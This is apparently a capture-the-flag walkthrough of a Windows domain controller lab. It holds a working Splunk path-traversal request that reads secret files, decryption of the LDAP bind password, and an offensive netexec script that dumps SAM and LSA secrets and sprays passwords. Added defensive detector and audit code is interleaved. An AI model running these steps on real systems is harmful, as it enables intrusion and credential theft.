Enum

$ rustscan --ulimit 10000 -a 10.129.12.198 -- -A -sC
 
[~] Automatically increasing ulimit value to 10000.
Open 10.129.12.198:53
Open 10.129.12.198:88
Open 10.129.12.198:135
Open 10.129.12.198:139
Open 10.129.12.198:389
Open 10.129.12.198:445
Open 10.129.12.198:464
Open 10.129.12.198:593
Open 10.129.12.198:636
Open 10.129.12.198:3268
Open 10.129.12.198:3269
Open 10.129.12.198:5985
Open 10.129.12.198:8000
Open 10.129.12.198:8089
Open 10.129.12.198:8088
Open 10.129.12.198:9389
Open 10.129.12.198:47001
Open 10.129.12.198:49664
Open 10.129.12.198:49667
Open 10.129.12.198:49668
Open 10.129.12.198:49674
Open 10.129.12.198:49666
Open 10.129.12.198:49683
Open 10.129.12.198:49665
Open 10.129.12.198:49685
Open 10.129.12.198:50396
Open 10.129.12.198:50403
Open 10.129.12.198:50412
Open 10.129.12.198:50429
 
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-04 12:53:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
|_Issuer: commonName=haze-DC01-CA/domainComponent=haze
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
|_Issuer: commonName=haze-DC01-CA/domainComponent=haze
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
|_Issuer: commonName=haze-DC01-CA/domainComponent=haze
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
|_Issuer: commonName=haze-DC01-CA/domainComponent=haze
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http syn-ack ttl 127 Splunkd httpd
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.12.198:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Splunkd
8088/tcp open ssl/http syn-ack ttl 127 Splunkd httpd
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
|_Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/localityName=San Francisco/emailAddress=support@splunk.com
|_http-server-header: Splunkd
| http-methods:
|_  Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp open ssl/http syn-ack ttl 127 Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
|_Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/localityName=San Francisco/emailAddress=support@splunk.com
|_http-server-header: Splunkd
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49683/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50396/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50403/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50412/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50429/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
 
Host script results:
|_clock-skew: 59m52s
  • Modify /etc/hosts
$ echo "10.129.12.198 haze.htb dc01.haze.htb" | sudo tee -a /etc/hosts
  • Port 8000

$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/system32/drivers/etc/hosts"
 
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
 
# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
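From the defender's side, the request above is what the Splunk Web access log should be watched for. The following detector is an added example, not part of these notes and not Splunk's own tooling; it assumes common-log-style lines (the sample lines are constructed), percent-decodes the path until stable so double encoding cannot hide the `..` segments, counts drive-prefixed `C:..` hops, and rates hits that reach files like splunk.secret or authentication.conf higher than plain probes.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of Splunk Web's web_access.log (common-log style);
# these lines are made up for the example, not captured from the host above.
SAMPLE_LOG = """\
10.10.14.5 - - [04/Apr/2025:12:55:01 +0000] "GET /en-US/account/login?return_to=%2Fen-US%2F HTTP/1.1" 200 1024
10.10.14.5 - - [04/Apr/2025:12:55:07 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/system32/drivers/etc/hosts HTTP/1.1" 200 824
10.10.14.5 - - [04/Apr/2025:12:55:09 +0000] "GET /en-US/modules/messaging/C%3A..%2FC%3A..%2FProgram%20Files/Splunk/etc/auth/splunk.secret HTTP/1.1" 200 256
10.10.14.5 - - [04/Apr/2025:12:55:12 +0000] "GET /en-US/modules/messaging/C:../C:../Windows/win.ini HTTP/1.1" 200 92
10.10.14.9 - - [04/Apr/2025:12:56:00 +0000] "GET /en-US/static/app/search/logo.png HTTP/1.1" 200 3000
"""

# Request line inside the quotes: method, path, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# A ".." segment, optionally prefixed with a drive letter ("C:.."), bounded by / or \.
DOTDOT_RE = re.compile(r'(?:^|(?<=[\\/]))(?:[A-Za-z]:)?\.\.(?=[\\/]|$)')
# Targets that turn a traversal from "probe" into "secret read" on a Splunk host.
SENSITIVE_RE = re.compile(r'(?i)(?:splunk\.secret|authentication\.conf|drivers[\\/]etc[\\/]hosts)')


def normalize_path(raw_path: str) -> str:
    """Drop the query string and percent-decode until stable, so double encoding cannot hide '..'."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def inspect_request(line: str):
    """Return a finding dict for a traversal attempt, or None for a benign request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = normalize_path(m.group("path"))
    segments = DOTDOT_RE.findall(path)
    if not segments:
        return None
    sensitive = bool(SENSITIVE_RE.search(path))
    return {
        "client": line.split(" ", 1)[0],
        "method": m.group("method"),
        "path": path,
        "dotdot_segments": len(segments),
        "sensitive_target": sensitive,
        "severity": "high" if sensitive else "medium",
    }


def scan_log(text: str) -> list:
    """Run inspect_request over every line and keep only the hits."""
    return [f for f in (inspect_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['severity']:6} {finding['client']:12} "
              f"{finding['dotdot_segments']:2}x'..' {finding['path']}")
```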
  • Documentation $SPLUNK_HOME/etc/system/default
  • Look for Kerberos or LDAP information
$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf"
 
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
 
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
 
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
 
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
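A config audit from the defender's side, added here as an example (not part of the original notes and not Splunk's tooling): it parses an authentication.conf laid out like the one above and flags the settings that made this LDAP bind dangerous once the file was readable. The sample stanzas are constructed from the layout above with the bindDNpassword ciphertext replaced by a placeholder.

```python
import configparser

# Constructed sample mirroring the stanzas retrieved above; the bindDNpassword
# ciphertext is a placeholder, not the value from the page.
SAMPLE_CONF = """\
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$PLACEHOLDER_CIPHERTEXT
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
"""

COMPLEXITY_KEYS = ("minPasswordUppercase", "minPasswordLowercase",
                   "minPasswordSpecial", "minPasswordDigit")


def load_conf(text: str) -> configparser.ConfigParser:
    """Parse Splunk's INI-style conf: interpolation off so '$' and '%' stay literal, key case kept."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_authentication_conf(text: str) -> list:
    """Return (severity, stanza, message) tuples for weak or risky settings."""
    cp = load_conf(text)
    findings = []

    if cp.has_section("splunk_auth"):
        pol = cp["splunk_auth"]
        length = pol.getint("minPasswordLength", fallback=8)
        if length < 12:
            findings.append(("medium", "splunk_auth", f"minPasswordLength={length} is below 12"))
        if all(pol.getint(k, fallback=0) == 0 for k in COMPLEXITY_KEYS):
            findings.append(("low", "splunk_auth", "no character-class requirement for local Splunk passwords"))

    auth = cp["authentication"] if cp.has_section("authentication") else None
    if auth is not None and auth.get("authType", "").upper() == "LDAP":
        for name in (n.strip() for n in auth.get("authSettings", "").split(",")):
            if not cp.has_section(name):
                findings.append(("medium", "authentication", f"authSettings points at missing stanza [{name}]"))
                continue
            s = cp[name]
            if s.getint("SSLEnabled", fallback=0) != 1:
                findings.append(("high", name,
                                 f"SSLEnabled=0: bind to {s.get('host', '?')}:{s.get('port', '389')} is plaintext "
                                 "LDAP, so every user login and the bind password cross the network unencrypted"))
            if s.get("bindDNpassword", "").startswith("$7$"):
                findings.append(("info", name,
                                 "bindDNpassword is $7$, reversible with splunk.secret: whoever can read both "
                                 "files recovers the bind account's password, so restrict both and use a "
                                 "dedicated least-privilege bind account"))
    return findings


if __name__ == "__main__":
    for sev, stanza, msg in audit_authentication_conf(SAMPLE_CONF):
        print(f"[{sev}] [{stanza}] {msg}")
```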
$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret"
 
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
 
$ pip3 install splunksecrets
 
$ nano splunk.secret
 
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
 
$ splunksecrets splunk-decrypt -S splunk.secret
Ciphertext:
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
 
Ld@p_Auth_Sp1unk@2k24
  • Attempt login as Paul Taylor
  • nxc.sh (can do manually of course)
#!/bin/bash
 
# Ensure proper usage
if [[ $# -lt 4 ]]; then
    echo "Usage: $0 <target> <domain> <username> <password> [dns-server]"
    exit 1
fi
 
TARGET=$1
DOMAIN=$2
USER=$3
PASS=$4
DNS=${5:-}
 
SCRIPT_DIR=$(pwd)
 
# Color definitions for output clarity
green='\033[1;32m'
red='\033[1;31m'
nc='\033[0m'
 
# Create a timestamped log directory
LOGDIR="nxc-logs-$(date +%F_%T | tr ':' '-')"
mkdir -p "$LOGDIR"
 
# Sync time with the target
echo -e "${green}[*] Syncing time with $TARGET...${nc}"
if sudo ntpdate "$TARGET" &>/dev/null; then
    echo -e "${green}[+] Time synced${nc}"
else
    echo -e "${red}[-] Time sync failed${nc}"
fi
 
# Helper functions for running commands and modules
run_cmd() {
    local PROTO=$1
    local DESC=$2
    local ARGS=$3
    local FILE=$(echo "$DESC" | tr ' ' '_' | tr -d '()')
    echo -e "\n${green}[+] $DESC${nc}"
    local CMD="nxc $PROTO $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' $ARGS --log '$LOGDIR/${PROTO}_${FILE}.txt'"
    [[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
    eval "$CMD"
}
 
run_mod() {
    local PROTO=$1
    local MODULE=$2
    local DESC=$3
    local EXTRA=${4:-}
    local FILE=$(echo "$DESC" | tr ' ' '_' | tr -d '()')
    echo -e "\n${green}[+] $DESC (Module: $MODULE)${nc}"
    local CMD="nxc $PROTO $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' -M $MODULE $EXTRA --log '$LOGDIR/${PROTO}_${FILE}.txt'"
    [[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
    eval "$CMD"
}
 
# --- RID Brute Force for User Discovery ---
echo -e "\n${green}[+] Running RID brute force for local user enumeration...${nc}"
CMD="nxc smb $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' --rid-brute --log '$LOGDIR/smb_RID_brute_force.txt'"
[[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
eval "$CMD"
 
# Extract usernames from RID brute force results
USERLIST_FILE="$SCRIPT_DIR/users.txt"
> "$USERLIST_FILE"
grep -E "SidTypeUser" "$LOGDIR/smb_RID_brute_force.txt" | awk -F '\\' '{print $2}' | awk '{print $1}' | sort -u >> "$USERLIST_FILE"
if [[ -s "$USERLIST_FILE" ]]; then
    echo -e "${green}[+] Extracted usernames saved to: $USERLIST_FILE${nc}"
else
    echo -e "${red}[-] No usernames extracted${nc}"
fi
 
# --- SMB Scans ---
run_cmd smb "Enumerate SMB shares" "--shares"
run_cmd smb "Dump SAM (local users)" "--sam"
run_cmd smb "Dump LSA secrets" "--lsa"
run_mod smb gpp_password "Extract Group Policy Preferences passwords"
run_mod smb smbghost "Check for SMBGhost (CVE-2020-0796)"
 
# --- LDAP Scans ---
run_cmd ldap "Enumerate LDAP users" "--users"
run_mod ldap whoami "Get current user info"
run_mod ldap ldap-checker "Check LDAP misconfigurations"
 
# --- BloodHound Collection ---
echo -e "\n${green}[+] Collecting BloodHound data...${nc}"
CMD="nxc ldap $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' --bloodhound --log '$LOGDIR/ldap_BloodHound_Collection.txt'"
[[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
eval "$CMD"
 
LATEST_BH_ZIP=$(ls -t ~/.nxc/logs/*_bloodhound.zip 2>/dev/null | head -n1)
if [[ -f "$LATEST_BH_ZIP" ]]; then
    mv "$LATEST_BH_ZIP" "$LOGDIR/"
    echo -e "${green}[+] Moved BloodHound zip to: $LOGDIR/${LATEST_BH_ZIP##*/}${nc}"
else
    echo -e "${red}[-] No BloodHound zip found to move${nc}"
fi
 
# --- WinRM Access Test ---
echo -e "\n${green}[+] Testing WinRM access...${nc}"
nxc winrm $TARGET -u "$USER" -p "$PASS" -d "$DOMAIN" --log "$LOGDIR/winrm_test.txt"
 
# --- Password Spray ---
echo -e "\n${green}[+] Attempting password spray with extracted usernames...${nc}"
nxc smb $TARGET -d "$DOMAIN" -u "$USERLIST_FILE" -p "$PASS" --continue-on-success --log "$LOGDIR/smb_password_spray.txt"
 
# Extract valid users from the password spray
VALID_USERS=$(awk '/\[\+\]/ {split($2, a, "\\"); print a[2]}' "$LOGDIR/smb_password_spray.txt")
if [[ -n "$VALID_USERS" ]]; then
    echo -e "${green}[+] Re-scanning with valid users found from password spray...${nc}"
    while read -r VALID_USER; do
        [[ -z "$VALID_USER" ]] && continue
        echo -e "\n${green}[*] Running scans for $VALID_USER${nc}"
        run_cmd smb "Enumerate shares as $VALID_USER" "-u '$VALID_USER' -p '$PASS' -d '$DOMAIN' --shares"
        run_mod ldap whoami "Whoami as $VALID_USER" "-u '$VALID_USER' -p '$PASS' -d '$DOMAIN'"
    done <<< "$VALID_USERS"
fi
 
echo -e "${green}\n[\u2714] Privilege escalation scan complete. Logs saved in: $LOGDIR${nc}"
  • Install and execute nxc.sh
$ sudo apt install netexec
$ ./nxc.sh haze.htb haze.htb paul.taylor 'Ld@p_Auth_Sp1unk@2k24' 10.129.12.198
 
[*] Syncing time with haze.htb...
[+] Time synced
 
[+] Running RID brute force for local user enumeration...
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.129.12.198   445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.129.12.198   445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.129.12.198   445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.129.12.198   445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.129.12.198   445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.129.12.198   445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.12.198   445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.129.12.198   445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.12.198   445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.12.198   445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.12.198   445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.129.12.198   445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.129.12.198   445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.129.12.198   445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.129.12.198   445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.129.12.198   445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.129.12.198   445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.129.12.198   445    DC01             1112: HAZE\Support_Services (SidTypeGroup)
[+] Extracted usernames saved to: /{pwd}/users.txt
 
[+] Enumerate SMB shares
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             [*] Enumerated shares
SMB         10.129.12.198   445    DC01             Share           Permissions     Remark
SMB         10.129.12.198   445    DC01             -----           -----------     ------
SMB         10.129.12.198   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.12.198   445    DC01             C$                              Default share
SMB         10.129.12.198   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.12.198   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.12.198   445    DC01             SYSVOL          READ            Logon server share
 
[+] Dump SAM (local users)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[+] Dump LSA secrets
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[+] Extract Group Policy Preferences passwords (Module: gpp_password)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             [*] Enumerated shares
SMB         10.129.12.198   445    DC01             Share           Permissions     Remark
SMB         10.129.12.198   445    DC01             -----           -----------     ------
SMB         10.129.12.198   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.12.198   445    DC01             C$                              Default share
SMB         10.129.12.198   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.12.198   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.12.198   445    DC01             SYSVOL          READ            Logon server share
GPP_PASS... 10.129.12.198   445    DC01             [+] Found SYSVOL share
GPP_PASS... 10.129.12.198   445    DC01             [*] Searching for potential XML files containing passwords
SMB         10.129.12.198   445    DC01             [*] Started spidering
SMB         10.129.12.198   445    DC01             [*] Spidering .
SMB         10.129.12.198   445    DC01             [*] Done spidering (Completed in 3.8577628135681152)
 
[+] Check for SMBGhost (CVE-2020-0796) (Module: smbghost)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMBGHOST    10.129.12.198   445    DC01             Potentially vulnerable to SMBGhost (CVE-2020-0796)
 
[+] Enumerate LDAP users
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
LDAP        10.129.12.198   389    DC01             [*] Enumerated 1 domain users: haze.htb
LDAP        10.129.12.198   389    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.129.12.198   389    DC01             paul.taylor                   2025-04-04 18:46:13 0
 
[+] Get current user info (Module: whoami)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
WHOAMI      10.129.12.198   389    DC01             distinguishedName: CN=Paul Taylor,OU=Restricted Users,DC=haze,DC=htb
WHOAMI      10.129.12.198   389    DC01             Member of: CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
WHOAMI      10.129.12.198   389    DC01             name: Paul Taylor
WHOAMI      10.129.12.198   389    DC01             Enabled: Yes
WHOAMI      10.129.12.198   389    DC01             Password Never Expires: Yes
WHOAMI      10.129.12.198   389    DC01             Last logon: 133882613437878328
WHOAMI      10.129.12.198   389    DC01             pwdLastSet: 133882659731940609
WHOAMI      10.129.12.198   389    DC01             logonCount: 3
WHOAMI      10.129.12.198   389    DC01             sAMAccountName: paul.taylor
 
[+] Check LDAP misconfigurations (Module: ldap-checker)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
LDAP-CHE... 10.129.12.198   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.129.12.198   389    DC01             LDAPS Channel Binding is set to "NEVER"
 
[+] Collecting BloodHound data...
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
LDAP        10.129.12.198   389    DC01             Resolved collection methods: group, trusts, localadmin, session
LDAP        10.129.12.198   389    DC01             Done in 00M 05S
LDAP        10.129.12.198   389    DC01             Compressing output into /home/munk/.nxc/logs/DC01_10.129.12.198_2025-04-04_144934_bloodhound.zip
[+] Moved BloodHound zip to: nxc-logs-2025-04-04_14-48-54/DC01_10.129.12.198_2025-04-04_144934_bloodhound.zip
 
[+] Testing WinRM access...
WINRM       10.129.12.198   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.12.198   5985   DC01             [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[+] Attempting password spray with extracted usernames...
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
